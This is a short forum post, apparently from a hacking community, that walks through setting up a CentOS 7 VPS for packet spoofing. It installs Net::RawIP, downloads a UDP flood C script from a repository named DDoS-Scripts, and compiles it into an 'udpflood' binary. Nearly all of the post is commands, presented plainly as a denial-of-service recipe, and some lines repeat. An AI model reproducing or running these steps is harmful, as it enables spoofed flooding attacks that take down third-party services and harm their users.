OP 25 June, 2022 - 04:01 PM
(This post was last modified: 25 June, 2022 - 04:03 PM by hamerton. Edited 1 time in total.)
Hi guys, today I show you how to enable spoofing on a VPS
When you choose a host
Install CentOS 7.
Run the following commands
Next us wget it likely will not be installed by default so just run
When you choose a host
Install CentOS 7.
Run the following commands
Code:
sudo yum install gcc
sudo yum update
sudo yum install cpan -y
cpan
install Net::RawIP
Next us wget it likely will not be installed by default so just run
Code:
yum install wget -y
then download the script with
wget https://raw.githubusercontent.com/vbooter/DDoS-Scripts/master/UDP.c
chmod +x UDP.c
gcc UDP.c -o udpflood -pthread
ENJOY, DONT FORGET CLICK LIKE BUTTON